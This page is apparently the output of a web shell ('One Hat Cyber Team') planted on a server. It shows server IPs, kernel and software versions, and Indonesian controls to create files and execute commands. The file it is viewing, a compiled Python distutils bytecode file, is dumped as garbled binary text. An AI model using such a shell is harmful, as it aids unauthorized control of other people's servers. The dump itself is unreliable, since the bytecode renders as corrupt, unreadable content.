⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.19
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib64
/
python3.6
/
distutils
/
command
/
__pycache__
/
View File Name :
bdist.cpython-36.pyc
3 \� � @ sH d Z ddlZddlmZ ddlT ddlmZ dd� ZG dd � d e�ZdS ) zidistutils.command.bdist Implements the Distutils 'bdist' command (create a built [binary] distribution).� N)�Command)�*)�get_platformc C sT ddl m} g }x,tjD ]"}|jd| dtj| d f� qW | |�}|jd� dS )zFPrint list of available formats (arguments to "--format" option). r )�FancyGetoptzformats=N� z'List of available distribution formats:)Zdistutils.fancy_getoptr �bdist�format_commands�append�format_commandZ print_help)r �formats�formatZpretty_printer� r �/usr/lib64/python3.6/bdist.py�show_formats s r c @ s� e Zd ZdZd6ddde� fd7d8d9d:d;gZdgZdd defgZd<Z ddd�Z dddddd d!dd"g Zd=d>d?d@dAdBdCdDdEd/� Zd0d1� Z d2d3� Zd4d5� Zd S )Fr z$create a built (binary) distribution�bdist-base=�b�4temporary directory for creating built distributionsz plat-name=�pz;platform name to embed in generated filenames (default: %s)�formats=N�/formats for distribution (comma-separated list)� dist-dir=�d�=directory to put final built distributions in [default: dist]� skip-build�2skip rebuilding everything (for testing/debugging)�owner=�u�@Owner name used when creating a tar file [default: current user]�group=�g�AGroup name used when creating a tar file [default: current group]zhelp-formatsz$lists available distribution formats� bdist_rpm�gztar�zip)�posix�nt�rpm�bztar�xztar�ztar�tar�wininst�msi�RPM distribution� bdist_dumb�gzip'ed tar file�bzip2'ed tar file�xz'ed tar file�compressed tar file�tar file� bdist_wininst�Windows executable installer�ZIP file� bdist_msi�Microsoft Installer) r&